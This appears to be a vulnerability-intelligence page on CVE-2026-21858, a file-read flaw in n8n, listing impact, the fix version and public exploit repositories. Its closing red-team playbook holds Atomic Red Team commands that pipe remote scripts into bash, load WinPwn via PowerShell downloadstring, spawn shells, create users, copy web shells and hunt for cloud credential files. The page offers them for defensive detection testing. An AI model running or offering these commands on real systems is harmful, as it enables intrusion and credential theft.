CVE-2026-21858
Overview
This vulnerability is a server-side file access flaw caused by improper input validation in n8n's form-based workflow execution component. Specifically, the affected versions (1.65.0 through 1.120.x) allow unauthenticated attackers to exploit workflow execution mechanisms to access arbitrary files on the underlying server. The root cause lies in insufficient sanitization of workflow inputs that are processed without authentication checks, enabling unauthorized file retrieval through crafted workflow requests.
Vulnerability Description
n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0.
Impact
An unauthenticated remote attacker can leverage this vulnerability to access sensitive files on the server hosting n8n, potentially exposing credentials, configuration data, or other confidential information. No user interaction or privileges are required, and the attack can be performed over the network without authentication (CVSS vector AV:N/AC:L/PR:N/UI:N). This exposure may facilitate further compromise depending on the deployment context and workflow configurations, including lateral movement or escalation within the affected environment.
Solution
Users should upgrade n8n to version 1.121.0 or later, where this vulnerability is resolved as detailed in the official security advisory GHSA-v4pr-fm98-w9pg available on GitHub. The vendor recommends applying this update promptly to mitigate the issue. No alternative workarounds are specified; refer to the advisory for comprehensive patching instructions and version verification.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the n8n workflow automation platform arises from improper handling of form-based workflows, which allows an attacker to exploit the system and access files on the underlying server. This issue primarily affects versions from 1.65.0 up to, but not including, 1.121.0. The core of the vulnerability lies in the platform's insufficient validation and sanitization of user inputs within these workflows. As a result, an attacker can craft specific requests that manipulate the workflow execution, leading to unauthorized file access. This flaw highlights a significant oversight in the application's security architecture, particularly in how it processes and executes user-defined workflows.
Attack vectors for this vulnerability are varied, but they predominantly involve unauthenticated remote access. An attacker could leverage this flaw by creating a malicious workflow that, when executed, triggers the file access mechanism. This could be done through social engineering tactics to lure users into executing the workflow or by directly targeting the n8n instance if it is exposed to the internet. Once the workflow is executed, sensitive information stored on the server, such as configuration files, user data, or other critical assets, could be exposed. Depending on the deployment configuration and the specific workflows in use, this could lead to further compromise, such as data exfiltration or lateral movement within the network.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on n8n for automating workflows that handle sensitive data. The potential for data exposure poses significant business risks, including regulatory non-compliance, reputational damage, and financial loss. Organizations may face legal repercussions if sensitive customer data is leaked, especially in industries governed by strict data protection regulations. Furthermore, the exploitation of this vulnerability could lead to a broader compromise of the organization's IT infrastructure, allowing attackers to pivot to other systems and escalate their access privileges.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest version of n8n, specifically version 1.121.0 or later, where the issue has been addressed. Regularly updating software and applying security patches is a fundamental practice in maintaining a secure environment. Additionally, organizations should conduct thorough security assessments of their n8n workflows to identify any potentially vulnerable configurations or workflows that may expose sensitive data. Implementing strong access controls and authentication mechanisms can also help mitigate the risk of unauthorized access. Monitoring for unusual activity within the n8n instance and employing web application firewalls can further enhance security by detecting and blocking potential exploitation attempts.
In conclusion, the vulnerability within the n8n workflow automation platform represents a critical risk that organizations must address proactively. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves against exploitation. Implementing robust detection and mitigation strategies will not only safeguard sensitive information but also reinforce the overall security posture of the organization in an increasingly complex threat landscape.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-21858, indicating increased adversary interest and potential exploitation attempts targeting vulnerable n8n workflow automation instances. While the overall exploit trend shows a slight decline, the recent uptick in telemetry suggests that threat actors may be intensifying reconnaissance or initial access efforts. Notably, new proof-of-concept exploits have surfaced, broadening the toolkit available to attackers and lowering the barrier for exploitation. This development elevates the operational risk for organizations running affected versions, as unauthenticated remote attackers can leverage these tools to access sensitive files and potentially achieve remote code execution. Consequently, the threat level for CVE-2026-21858 should be considered sustained at a critical severity with an increased likelihood of active exploitation, underscoring the urgency for defenders to maintain vigilant monitoring and detection capabilities.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
N8n | N8n | All |
cpe:2.3:a:n8n:n8n:*:*:*:*:*:node.js:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
n8n arbitrary file read
auxiliary/gather/ni8mare_cve_2026_21858
|
dor attias, msutovsky-r7 | Unknown | - | View |
GitHub PoCs (16)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2026-21858
n8n Ni8mare - Unauthenticated Arbitrary File Read to RCE Chain (CVSS 10.0)
|
Chocapikk | 258 | 51 | 2026-01-07 | View |
|
sh4den/CVE-2026-21858
Proof of Concept: CVE-2026-21858 is vulnerability on n8n where unauthenticated remote attackers can access sensitive fil...
|
sh4den | 3 | 0 | 2026-01-20 | View |
|
SystemVll/CVE-2026-21858
Proof of Concept: CVE-2026-21858 is vulnerability on n8n where unauthenticated remote attackers can access sensitive fil...
|
SystemVll | 3 | 0 | 2026-01-20 | View |
|
EQSTLab/CVE-2026-21858
Ni8mare, n8n RCE
|
EQSTLab | 1 | 1 | 2026-02-11 | View |
|
0xBlackash/CVE-2026-21858
CVE-2026-21858
|
0xBlackash | 1 | 0 | 2026-02-23 | View |
|
cropnet/Ni8mare
Comprehensive vulnerability detection tool for n8n workflow automation instances. Detects the critical CVE-2026-21858 vu...
|
cropnet | 1 | 0 | 2026-01-12 | View |
|
sec-dojo-com/CVE-2026-21858
|
sec-dojo-com | 1 | 0 | 2026-01-20 | View |
|
Fomovet/cve-2026-21858
POC for CVE-2026-21858
|
Fomovet | 0 | 0 | 2026-06-21 | View |
|
Bannt08/Research-CVE-2026-21858
|
Bannt08 | 0 | 0 | 2026-05-08 | View |
|
masterwok/PoC-CVE-2026-21858
Proof-of-concept exploit for CVE-2026-21858 (ni8mare) impacting n8n versions < 1.121.0
|
masterwok | 0 | 0 | 2026-04-16 | View |
|
kaleth4/CVE-2026-21858
|
kaleth4 | 0 | 0 | 2026-04-09 | View |
|
bgarz929/Ashwesker-CVE-2026-21858
CVE-2026-21858
|
bgarz929 | 0 | 0 | 2026-01-28 | View |
|
Alhakim88/CVE-2026-21858
Hack
|
Alhakim88 | 0 | 0 | 2026-01-30 | View |
|
bamov970/CVE-2026-21858
|
bamov970 | 0 | 0 | 2026-02-24 | View |
|
Yati2/Ni8mare-CVE-2026-21858
|
Yati2 | 0 | 0 | 2026-03-13 | View |
|
sastraadiwiguna-purpleeliteteaming/SASTRA-ADI-WIGUNA-CVE-2026-21858-Holistic-Audit
SASTRA-ADI-WIGUNA-CVE-2026-21858-Holistic-Audit
|
sastraadiwiguna-purpleeliteteaming | 0 | 0 | 2026-01-17 | View |
Threat Feed
24 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-21858 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/n8n-io/n8n/security/advisories/GHSA-v4pr-fm98-w9pg |
| cyera.com |
GitHub CVE
x_refsource_MISC
|
https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858 |